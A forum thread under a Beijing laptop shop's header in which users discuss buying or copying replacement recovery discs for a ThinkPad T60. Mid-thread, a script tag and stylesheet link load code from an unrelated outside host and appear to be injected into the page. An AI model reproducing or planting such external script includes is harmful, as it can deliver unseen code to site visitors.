开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

关于恢复盘

关于恢复盘,急

买T60时送的恢复盘出现裂缝了,不敢再使用了,怕在光驱里面裂开就麻烦了,请问可以另外赠送一份或者卖吗?谢谢
30一套
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

是3张吗?如果我只要蓝色那张可以吗?
单张的10元
支持支付宝吗?我就要蓝色的那张,T60的,谢谢
刻一张DVD 多久啊要?  我想导出来自己再刻几张~~~
刻?我也想,貌视要找很大的容量的空盘,还是买好,安心
斑竹在吗?给我个买的淘宝链接,谢谢
配件只能全款邮购,不能通过支付宝的
那要通过邮购还是什么呢?请你把具体的购买方式告诉我,谢谢
因为我本人不在国内,只能用支付宝贝啊
国外?。。。。那可以走不了快递
那寄国内要怎么办手续?
顺便问下,自己刻的可以用吗 ?
我的盘磨了
能换么
晕~~!用nero做个iso就行了,以后想刻多少都行的!